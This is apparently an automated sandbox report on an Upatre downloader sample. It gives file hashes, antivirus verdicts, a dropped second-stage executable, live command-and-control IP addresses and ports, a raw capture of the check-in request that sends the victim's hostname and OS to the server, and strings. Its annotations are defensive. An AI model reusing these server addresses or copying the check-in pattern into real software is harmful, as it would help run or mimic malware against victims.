Analysis Date: 2015-10-23 18:02:43
MD5: f73e235e1b906ead76d3f6585b57653e
SHA1: b47c4f972fbfc2a66820b46fcbea12a7b6b2fa66

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Section code5 — md5: e22774f84a44424377be362ff708c6fc sha1: 26236473d5aceddb6faf0404470dff8d835890d2 size: 2560 (non-standard section name; the code section is normally .text)
Section .data — md5: 24f9c75072c1a0ecb1063239cb01f0b7 sha1: 563bdd3a83973b8f765deaa0d7cb80ec7484b59b size: 11776
Section .rsrc — md5: 2f0b57a1e3cd0e0b696f7f61b2e0ac6b sha1: 1624b9fb8b5953bf90c907b88a4350400dadd4d1 size: 26112
Section .reloc — md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512
Section .DAT — md5: bf619eac0cdf3f68d496ea9344137e8b sha1: 5c3eb80066420002bc3dcc7ca4ab6efad7ed4ae5 size: 512 (same hashes and size as .reloc, i.e. byte-for-byte identical content)
Timestamp: 1997-10-28 22:08:58 (PE header compile time; almost certainly backdated — it predates the Vista/7-era trustInfo and compatibility manifest embedded in the binary (see Strings), so do not use it to date the sample)
PEhash: fcc5aab56bee31ec645c989eebd1fea8fb919601
IMPhash: 87816ddeebac1e3baca406b07ec01a89
AV results (26 of 31 engines detect; 5 report no_virus):
AV Rising: no_virus
AV CA (E-Trust Ino): no_virus
AV F-Secure: Trojan.Downloader.JRQL
AV Dr. Web: Trojan.Upatre.201
AV ClamAV: no_virus
AV Arcabit (arcavir): Trojan.Downloader.JRQL
AV BullGuard: Trojan.Downloader.JRQL
AV Padvish: no_virus
AV VirusBlokAda (vba32): TrojanDownloader.Upatre
AV CAT (quickheal): TrojanDwnldr.Upatre.MUE.A5
AV Trend Micro: TROJ_UP.DB5F9D28
AV Kaspersky: Trojan-Downloader.Win32.Upatre.fin
AV Zillya!: no_virus
AV Emsisoft: Trojan.Downloader.JRQL
AV Ikarus: Trojan-Downloader.Upatre
AV Frisk (f-prot): W32/Upatre.E.gen!Eldorado
AV Authentium: W32/Upatre.E.gen!Eldorado
AV MalwareBytes: Trojan.Upatre
AV MicroWorld (escan): Trojan.Downloader.JRQL
AV Microsoft Security Essentials: TrojanDownloader:Win32/Upatre
AV K7: Trojan-Downloader ( 0049d22b1 )
AV BitDefender: Trojan.Downloader.JRQL
AV Fortinet: W32/Waski.F!tr
AV Symantec: Downloader.Upatre!gen9
AV Grisoft (avg): Downloader.Generic14.TJE
AV Eset (nod32): Win32/TrojanDownloader.Waski.F
AV Alwil (avast): Malware-gen:Win32:Malware-gen
AV Ad-Aware: Trojan.Downloader.JRQL
AV Twister: TrojanDldr.Upatre.fin.bfji
AV Avira (antivir): TR/Kryptik.qgmnm
AV Mcafee: Upatre-FABT!F73E235E1B90

Runtime Details:


Process
↳ C:\malware.exe

Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\ASRUD974.txt
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\UsqXgL7w.exe
Creates Process: C:\Documents and Settings\Administrator\Local Settings\Temp\UsqXgL7w.exe (second stage dropped to %TEMP% and executed; the file names appear randomly generated, so detect on the drop-to-%TEMP%-then-execute behaviour rather than on the names)

Process
↳ C:\Documents and Settings\Administrator\Local Settings\Temp\UsqXgL7w.exe

Network Details:

DNS: icanhazip.com
Type: A
104.238.141.75
DNS: icanhazip.com
Type: A
104.238.136.31
DNS: icanhazip.com
Type: A
104.238.145.30
HTTP GET: http://icanhazip.com/ (legitimate public IP-echo service, presumably queried to learn the victim's external address before check-in; on its own the domain is not a reliable block indicator)
User-Agent: Mozilla/5.0 (Windows NT 6.1)
HTTP GET: http://81.7.109.65:13384/TUSR22/COMPUTER-XXXXXX/0/51-SP3/0/ (check-in to a bare IP on a non-standard port; the path carries the sandbox hostname and what looks like the OS version and service pack, so it will differ per victim — pivot on the IP:port, the path shape and the User-Agent rather than the exact URL)
User-Agent: Mozilla/5.0 (Windows NT 6.1) (hard-coded: it claims Windows 7 although the file paths above are Windows XP-style, and it lacks the browser tokens a real browser sends — together with the Accept and Cache-Control headers in the pcap below this is a usable network signature)
Flow TCP: 192.168.1.1:1031 ➝ 104.238.141.75:80
Flow TCP: 192.168.1.1:1032 ➝ 81.7.109.65:13384
Flow TCP: 192.168.1.1:1033 ➝ 80.87.220.102:443
Flow TCP: 192.168.1.1:1034 ➝ 80.87.220.102:443
Flow TCP: 192.168.1.1:1035 ➝ 80.87.220.102:443
Flow TCP: 192.168.1.1:1036 ➝ 80.87.220.102:443
Flow TCP: 192.168.1.1:1037 ➝ 46.151.130.90:443
Flow TCP: 192.168.1.1:1038 ➝ 46.151.130.90:443
Flow TCP: 192.168.1.1:1039 ➝ 46.151.130.90:443
Flow TCP: 192.168.1.1:1040 ➝ 46.151.130.90:443
Flow TCP: 192.168.1.1:1041 ➝ 91.240.97.71:443
Flow TCP: 192.168.1.1:1042 ➝ 91.240.97.71:443
Flow TCP: 192.168.1.1:1043 ➝ 91.240.97.71:443
Flow TCP: 192.168.1.1:1044 ➝ 91.240.97.71:443
Flow TCP: 192.168.1.1:1045 ➝ 91.240.97.36:443
Flow TCP: 192.168.1.1:1046 ➝ 91.240.97.36:443
Flow TCP: 192.168.1.1:1047 ➝ 91.240.97.36:443
Flow TCP: 192.168.1.1:1048 ➝ 91.240.97.36:443
Flow TCP: 192.168.1.1:1049 ➝ 91.240.97.38:443
Flow TCP: 192.168.1.1:1050 ➝ 91.240.97.38:443
Flow TCP: 192.168.1.1:1051 ➝ 91.240.97.38:443
Flow TCP: 192.168.1.1:1052 ➝ 91.240.97.38:443
Flow TCP: 192.168.1.1:1053 ➝ 109.196.204.142:443
Flow TCP: 192.168.1.1:1054 ➝ 109.196.204.142:443
Flow TCP: 192.168.1.1:1055 ➝ 109.196.204.142:443
Flow TCP: 192.168.1.1:1056 ➝ 188.123.54.111:443
Flow TCP: 192.168.1.1:1057 ➝ 188.123.54.111:443
Flow TCP: 192.168.1.1:1058 ➝ 188.123.54.111:443
Note: after the two HTTP requests the sample walks a list of direct-IP :443 destinations, opening four short connections to each before moving on (only two are seen to the last address, so the capture or the analysis window may have ended there); no DNS lookups precede these, so the addresses appear to be embedded in the sample and are the most durable block-list indicators in this report.

Raw Pcap (the two HTTP requests are shown in full; the :443 exchanges are cut to alternating 4- and 3-byte fragments — 80 4c 01 03 / 80 2b 01 — which do not begin like a TLS record (0x16 0x03 …); the leading 0x80 resembles an SSLv2-style length prefix, but the protocol cannot be confirmed from what is captured here)
0x00000000 (00000)   47455420 2f204854 54502f31 2e310d0a   GET / HTTP/1.1..
0x00000010 (00016)   41636365 70743a20 74657874 2f2a2c20   Accept: text/*, 
0x00000020 (00032)   6170706c 69636174 696f6e2f 2a0d0a55   application/*..U
0x00000030 (00048)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000040 (00064)   6c612f35 2e302028 57696e64 6f777320   la/5.0 (Windows 
0x00000050 (00080)   4e542036 2e31290d 0a486f73 743a2069   NT 6.1)..Host: i
0x00000060 (00096)   63616e68 617a6970 2e636f6d 0d0a4361   canhazip.com..Ca
0x00000070 (00112)   6368652d 436f6e74 726f6c3a 206e6f2d   che-Control: no-
0x00000080 (00128)   63616368 650d0a0d 0a                  cache....

0x00000000 (00000)   47455420 2f545553 5232322f 434f4d50   GET /TUSR22/COMP
0x00000010 (00016)   55544552 2d585858 5858582f 302f3531   UTER-XXXXXX/0/51
0x00000020 (00032)   2d535033 2f302f20 48545450 2f312e31   -SP3/0/ HTTP/1.1
0x00000030 (00048)   0d0a5573 65722d41 67656e74 3a204d6f   ..User-Agent: Mo
0x00000040 (00064)   7a696c6c 612f352e 30202857 696e646f   zilla/5.0 (Windo
0x00000050 (00080)   7773204e 5420362e 31290d0a 486f7374   ws NT 6.1)..Host
0x00000060 (00096)   3a203831 2e372e31 30392e36 353a3133   : 81.7.109.65:13
0x00000070 (00112)   3338340d 0a436163 68652d43 6f6e7472   384..Cache-Contr
0x00000080 (00128)   6f6c3a20 6e6f2d63 61636865 0d0a0d0a   ol: no-cache....
0x00000090 (00144)                                         

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.

0x00000000 (00000)   804c0103                              .L..

0x00000000 (00000)   802b01                                .+.


Strings (selected; note the embedded manifest below requests level="requireAdministrator", which triggers a UAC elevation prompt on Vista and later and has no effect on the XP-style sandbox used here; most of the remaining entries are Windows API export names spanning many DLLs — whether they are genuine imports or padding cannot be determined from this listing alone)
1T4VKTN
3\caJRhtem3h\sys
6fu(Yj
AB@CGF
ACUIProviderInvokeUI
AmpFactorToDB
</assembly>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
AtlAxAttachControl
AtlComPtrAssign
atl.dll
B@CFG"
B@CGFw
B.data
CFGMGR32.dll
CM_Add_Empty_Log_Conf
CM_Add_Empty_Log_Conf_Ex
CM_Add_IDA
CM_Add_ID_ExA
CM_Add_ID_ExW
CM_Add_IDW
CM_Add_Range
CM_Add_Res_Des
CM_Add_Res_Des_Ex
CM_Connect_MachineA
CM_Connect_MachineW
CM_Create_DevNodeA
CMP_Init_Detection
</compatibility>
<compatibility xmlns="urn:schemas-microsoft-com:compatibility.v1">
CreateMutexA
CryptUIDlgCertMgr
CryptUIDlgFreeCAContext
CryptUIDlgSelectCA
CryptUIDlgSelectCertificateA
CryptUIDlgSelectCertificateFromStore
CryptUIDlgSelectCertificateW
CryptUIDlgSelectStoreA
CryptUIDlgSelectStoreW
CryptUIDlgViewContext
CryptUIDlgViewCRLA
CryptUIDlgViewCRLW
CryptUIDlgViewCTLA
CryptUIDlgViewCTLW
CryptUIDlgViewSignerInfoA
CryptUIDlgViewSignerInfoW
CRYPTUI.dll
DecodePointer
DNSAPI.dll
DnsQuery_A
DnsQueryConfig
DnsQueryConfigAllocEx
DnsQueryConfigDword
DnsQueryExA
DnsQueryExUTF8
DnsQueryExW
DnsQuery_UTF8
DnsQuery_W
DnsRecordBuild_UTF8
DnsRecordBuild_W
DnsRecordCompare
DnsRecordCopyEx
DnsRecordListFree
DnsRecordSetCompare
DnsRecordSetCopyEx
DsGetDcCloseW
DsGetDcNameA
DsGetDcNameW
DsGetDcNameWithAccountA
DsGetDcNameWithAccountW
DsGetDcNextA
DsGetDcNextW
DsGetDcOpenA
DsGetDcOpenW
DsGetDcSiteCoverageA
DsGetDcSiteCoverageW
DsGetForestTrustInformationW
DsGetSiteNameA
DsGetSiteNameW
DUserCastClass
DUserDeleteGadget
duser.DLL
ExitProcess
GetCommandLineA
GetCommState
GetOEMCP
GetVersionExW
GetWindowsDirectoryA
hq6.2y!
h#V!k<
IsRasmanProcess
i%VD+u
~kbg/V
kernel32.dll
	M1=kkFg-
MprAdminInterfaceCreate
mprapi.dll
msvcrt.dll
NDdeApi.dll
NDdeGetErrorStringA
netapi32.dll
NOKHJI
;@N{Yv
pstorec.dll
PStoreCreateInstance
quartz.dll
QueryDosDeviceA
RasActivateRoute
RasActivateRouteEx
RasAddConnectionPort
RasAddNotification
RasAllocateRoute
RasBundleClearStatistics
RasBundleClearStatisticsEx
RasBundleGetPort
RasBundleGetStatistics
RasBundleGetStatisticsEx
RasCompressionGetInfo
RasCompressionSetInfo
RasConnectionEnum
RasConnectionGetStatistics
RasCreateConnection
RasDeAllocateRoute
RasDestroyConnection
RasDeviceConnect
rasman.dll
REGAPI.dll
RegBuildNumberQuery
RegCdCreateA
RegCdCreateW
RegCdDeleteA
RegCdDeleteW
RegCdEnumerateA
RegCdEnumerateW
RegCdQueryA
RegCdQueryW
RegCloseServer
RegConsoleShadowQueryA
RegConsoleShadowQueryW
RegDefaultUserConfigQueryA
RegDefaultUserConfigQueryW
.reloc
</requestedExecutionLevel>
<requestedExecutionLevel level="requireAdministrator" uiAccess="false">
</requestedPrivileges>
<requestedPrivileges>
</security>
<security>
!This program cannot be run in DOS mode.
tn`ef$
</trustInfo>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v3">
-'v=.3
W*e51d
wh.dllhtsrv
w+"ICX
Wj8(GT
x,#J#1